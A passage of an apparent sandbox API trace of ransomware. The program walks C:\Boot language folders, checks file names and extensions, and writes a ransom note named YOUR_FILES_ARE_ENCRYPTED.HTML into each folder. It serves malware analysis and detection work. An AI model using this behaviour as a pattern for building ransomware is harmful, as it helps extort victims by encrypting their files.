dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.570] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.571] CloseHandle (hObject=0x300) returned 1 [0104.572] GetProcessHeap () returned 0x600000 [0104.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.572] GetProcessHeap () returned 0x600000 [0104.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.572] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0104.572] StrStrIW (lpFirst="ja-JP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.572] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0104.572] GetProcessHeap () returned 0x600000 [0104.572] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.573] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\ja-JP" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP") returned="\\\\?\\C:\\Boot\\ja-JP" [0104.573] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ja-JP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\*") returned="\\\\?\\C:\\Boot\\ja-JP\\*" [0104.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0104.573] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.573] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.573] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.573] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0104.573] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.574] lstrlenW (lpString=".mui") returned 4 [0104.574] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.574] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.574] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.574] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui") returned 33 [0104.574] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.574] lstrlenW (lpString=".mui") returned 4 [0104.574] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.574] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.574] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0104.574] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.574] GetProcessHeap () returned 0x600000 [0104.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ja-jp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.575] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.576] CloseHandle (hObject=0x300) returned 1 [0104.576] GetProcessHeap () returned 0x600000 [0104.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.576] GetProcessHeap () returned 0x600000 [0104.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.577] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0104.577] StrStrIW (lpFirst="ko-KR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.577] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0104.577] GetProcessHeap () returned 0x600000 [0104.577] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.578] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\ko-KR" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR") returned="\\\\?\\C:\\Boot\\ko-KR" [0104.578] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\*") returned="\\\\?\\C:\\Boot\\ko-KR\\*" [0104.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0104.578] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.578] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.578] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.578] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0104.578] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.578] lstrlenW (lpString=".mui") returned 4 [0104.578] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.578] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.578] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.579] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui") returned 33 [0104.579] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.579] lstrlenW (lpString=".mui") returned 4 [0104.579] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.579] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.579] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0104.579] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.579] GetProcessHeap () returned 0x600000 [0104.579] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.579] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ko-kr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.581] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.619] CloseHandle (hObject=0x300) returned 1 [0104.620] GetProcessHeap () returned 0x600000 [0104.620] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.620] GetProcessHeap () returned 0x600000 [0104.620] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.620] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0104.620] StrStrIW (lpFirst="lt-LT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.620] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT") returned 17 [0104.620] GetProcessHeap () returned 0x600000 [0104.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.621] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\lt-LT" | out: lpString1="\\\\?\\C:\\Boot\\lt-LT") returned="\\\\?\\C:\\Boot\\lt-LT" [0104.621] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\lt-LT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\lt-LT\\*") returned="\\\\?\\C:\\Boot\\lt-LT\\*" [0104.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\lt-LT\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626778 [0104.622] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.622] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.622] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.622] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 33 [0104.622] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.622] lstrlenW (lpString=".mui") returned 4 [0104.622] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.622] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.622] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0104.622] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\lt-LT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.622] GetProcessHeap () returned 0x600000 [0104.622] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.622] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\lt-lt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.623] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.624] CloseHandle (hObject=0x300) returned 1 [0104.624] GetProcessHeap () returned 0x600000 [0104.624] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.624] GetProcessHeap () returned 0x600000 [0104.624] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.625] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0104.625] StrStrIW (lpFirst="lv-LV", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.625] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV") returned 17 [0104.625] GetProcessHeap () returned 0x600000 [0104.625] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.626] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\lv-LV" | out: lpString1="\\\\?\\C:\\Boot\\lv-LV") returned="\\\\?\\C:\\Boot\\lv-LV" [0104.626] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\lv-LV", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\lv-LV\\*") returned="\\\\?\\C:\\Boot\\lv-LV\\*" [0104.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\lv-LV\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626878 [0104.626] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.626] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.626] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.626] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 33 [0104.626] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.626] lstrlenW (lpString=".mui") returned 4 [0104.626] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.626] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.626] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0104.626] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\lv-LV\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.626] GetProcessHeap () returned 0x600000 [0104.626] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.626] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\lv-lv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.627] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.627] CloseHandle (hObject=0x300) returned 1 [0104.628] GetProcessHeap () returned 0x600000 [0104.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.628] GetProcessHeap () returned 0x600000 [0104.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.628] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2960, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0104.628] StrStrIW (lpFirst="memtest.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.628] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0104.629] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0104.629] lstrlenW (lpString=".exe") returned 4 [0104.629] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0104.629] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0104.629] StrStrIW (lpFirst="nb-NO", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.629] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0104.629] 